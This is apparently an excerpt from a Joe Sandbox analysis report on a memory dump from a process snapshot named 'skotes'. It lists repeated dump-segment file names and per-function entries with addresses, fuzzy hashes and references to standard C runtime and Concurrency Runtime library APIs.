Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
String ID:
API String ID: 2885714658-0
Opcode ID: cadbd7d1f7656cfea567439622d977eadc8f69e95718d7bdd6f4d08e123d8ebd
Instruction ID: 02db3a879391106e7e1bd545aede8e6f7a1960b48a29091e10e690e8945226f1
Opcode Fuzzy Hash: cadbd7d1f7656cfea567439622d977eadc8f69e95718d7bdd6f4d08e123d8ebd
Instruction Fuzzy Hash: 20418C60A04344DADF39EBA0845A7EC77A56F11706F1440A9EC856B2C3DBAD5E0DCB62

Function 0075E7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0075E7D7

Part of subcall function 0075E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0075E577
Part of subcall function 0075E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0075E599

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0075E854
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0075E860
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0075E86F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0075E879
Concurrency::location::_Assign.LIBCMT ref: 0075E8AD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0075E8B5

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: b20a7ec2965671da322cdb9570b4bae64750bcb4c03268c187b1a136e65fe2fe
Instruction ID: bb70edd71a2c2e73d987a309be545f33b783475bc4d9427e9b364e8ce955d28b
Opcode Fuzzy Hash: b20a7ec2965671da322cdb9570b4bae64750bcb4c03268c187b1a136e65fe2fe
Instruction Fuzzy Hash: C6414C35A00204DFCF05DF64C898AADB7B5FF48311F1480A9DD499B382DB78AA45CF91

Function 00746E00 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00746ED1
std::_Rethrow_future_exception.LIBCPMT ref: 00746F22
std::_Rethrow_future_exception.LIBCPMT ref: 00746F32
__Mtx_unlock.LIBCPMT ref: 00746FD5
__Mtx_unlock.LIBCPMT ref: 007470DB
__Mtx_unlock.LIBCPMT ref: 00747116

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID:
API String ID: 1997747980-0
Opcode ID: fbd98a28ffb47c50185c41aae560d8db0212c0d43c4c6537c84a0023ff365ad3
Instruction ID: 00f76032014a80e163bd7898c11b2adb11e566f41fb44139adf5c74f6d3fa025
Opcode Fuzzy Hash: fbd98a28ffb47c50185c41aae560d8db0212c0d43c4c6537c84a0023ff365ad3
Instruction Fuzzy Hash: A1C1F3B1905308DBDF25DFB4C849BAEBBF4AF45310F00452EE41697652EB79E908CB62

Function 007544DE Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00754538
ListArray.LIBCONCRT ref: 0075456C
Hash.LIBCMT ref: 007545D5
Hash.LIBCMT ref: 007545E5

Part of subcall function 00759C41: std::bad_exception::bad_exception.LIBCMT ref: 00759C63

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0075474B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007547A4

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
String ID:
API String ID: 3010677857-0
Opcode ID: 34cc3da3a7e085a02ad34d91fed2e6059dd30f3d263e8513aff2c2d742bcc8d1
Instruction ID: 20b14ec8c07e2fb052dd6c48fac3aae6624cb8c13f5133423f9827e3675b9e06
Opcode Fuzzy Hash: 34cc3da3a7e085a02ad34d91fed2e6059dd30f3d263e8513aff2c2d742bcc8d1
Instruction Fuzzy Hash: 548151B0A11B52FBD708DF748449BD9FBA8BF09705F10421AF528D7281DBB8A564CBD1

Function 0074ECE6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0074ECED
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0074ED17

Part of subcall function 0074F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0074F3FA

__alloca_probe_16.LIBCMT ref: 0074ED53
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0074ED94
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0074EDC6
__freea.LIBCMT ref: 0074EDEC

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
String ID:
API String ID: 1319684358-0
Opcode ID: 1bcf510581249245c5c5593055fd1a50eac6f9a7765bd2bc3dbe3f0bccaabe3a
Instruction ID: e156dc08750a0f4adaaa0cdfde7393ede664c00fd6149a646e057eb870dd4e12
Opcode Fuzzy Hash: 1bcf510581249245c5c5593055fd1a50eac6f9a7765bd2bc3dbe3f0bccaabe3a
Instruction Fuzzy Hash: C9316971F00205CFCB15DFA8C8456ADB7B4BF09320F24406AE845E7390DB78AE028BA5

Function 0076CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0076CC66

Strings

vv, xrefs: 0076CBE1

Memory Dump Source

